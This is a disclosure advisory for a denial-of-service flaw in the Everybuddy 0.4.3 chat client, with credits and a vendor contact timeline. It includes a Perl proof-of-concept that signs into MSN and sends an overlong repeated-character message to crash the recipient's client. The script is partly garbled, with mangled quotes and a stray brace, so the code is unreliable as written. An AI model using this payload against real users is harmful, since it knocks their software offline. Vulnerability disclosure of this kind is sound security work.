‘Everybuddy Vulnerable to a DoS Attack (Long Message)’

Summary

Everybuddy has support for AIM, ICQ, MSN, Yahoo! and Jabber chat programs, the program contains a security vulnerability that allows remote attackers to cause the program to crash by sending it an overly long message (instant message).’

Credit:

‘The information has been provided by Noam Rathaus and SecurITeam Experts.’


Details

Vulnerable systems:
 * Everybuddy version 0.4.3

Exploit:
The exploit code will login as a user, wait for someone to talk to him, and send him the attack string.

#!/usr/bin/perl

use MSN; # from http://www.adamswann.com/library/2002/msn-perl/

my $client = MSN->new();
$client->connect(’email address’, ‘password’, ”, {
    Status => &Status,
    Answer => &Answer,
    Message => &Message,
    Join => &Join }
);

sub Status {
   my ($self, $username, $newstatus) = @_;

   print ‘Status() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

   # Print the status change info.
   print ‘${username}’s status changed from ‘ . $self->buddystatus($username) . ‘ to $newstatus.n’;

      # Initiate the call.
      $self->call($username);

      # The call may take a few seconds to complete, so we can’t
      # immediately send messages. Let’s put the message in a
      # FIFO (queue) that is keyed by username.
      push (@{$queue{$username}}, ‘Glad to see you online!’);
   }

}

sub Message {
   my ($self, $username, undef, $msg) = @_;

   print ‘Message() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

}

sub Join {
   my ($self, $username) = @_;

   print ‘Join() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

   # See if there’s anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {
      $$self->sendmsg($_);
   }
}

sub Answer {
   my ($self, $username) = @_;

   print ‘Answer() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

   # Send a hello message.
   $$self->sendmsg(‘AAAAAAAAAAAAAAAAAAAAAAAAAAAr’x55);

}

Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then disappeared again), we are forced to release this information, without receiving a proper response from them.

Disclosure timeline:
19/06/2003 – First attempt to contact vendor
20/06/2003 – First vendor response
22/06/2003 – PoC provided to vendor
01/07/2003 – Second attempt to contact vendor
01/08/2003 – Third attempt to contact vendor
05/08/2003 – Public advisory’

Categories: News